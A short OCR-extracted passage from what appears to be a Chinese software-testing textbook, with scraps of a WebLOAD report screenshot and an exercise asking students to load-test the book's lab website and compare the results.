Total Rounds om 6 
Total Hits 


Total TXS 























图 21-42 查看 报告 





HTTP/HTTPS 记录 和 脚本 迅速 建立 测试 ,从 预 设置 的 机 器 和 云端 生成 负载 测试 。 


Woms 


使 用 WebLOAD 工具 对 本 书 实验 1 提供 的 网 站 进行 性 能 测试 ,并 对 比分 析 测 试 结果 。 
提醒 : 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 性 能 测试 工具 的 使 用 。 
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